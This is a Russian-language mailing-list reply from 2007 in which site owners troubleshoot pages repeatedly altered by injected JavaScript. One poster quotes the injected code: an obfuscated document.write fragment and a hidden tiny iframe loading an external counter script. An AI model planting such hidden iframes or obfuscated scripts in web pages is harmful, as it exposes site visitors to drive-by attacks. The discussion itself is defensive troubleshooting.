On Mon, 1 Oct 2007 08:15:04 +0300
Константин <[EMAIL PROTECTED]> wrote:
>
> ДП> Та же тема. Думал, что пароли ушли через троянов на компах
> ДП> пользователей, которые имели доступ к сайту по ftp, заменил пароли,
> ДП> проверил, опять блин!
>
> Короче у меня была подобная ситуация ...
> Долго не мог понять что за ахинея ...
> Если честно до сих пор не пойму ...
> Но решилось просто !!!
> По одному отключал банеры и рекламу ....
> На одном из таких банеров и нашёл какай-то скрипт ...
> Правда, если честно со скриптом не разбирался ...
> Просто выкинул ссылку на эту банерную систему и всё ;)
>
> PS: в моём случае херило страницы дописывая в конец после тега </HTML>
> какой-то ява скипт ...
Похоже на то, что это mystat-in.net (MyTOP).
Заявку своему прову я уже отправил. Мож разберется.
А код такой:
"script type="text/javascript">document.write('\u003c\u0...."
"iframe src='http://x12345.org/img/counter.php?out=1189360677'
width='1' height='2'></iframe"
//Димыч
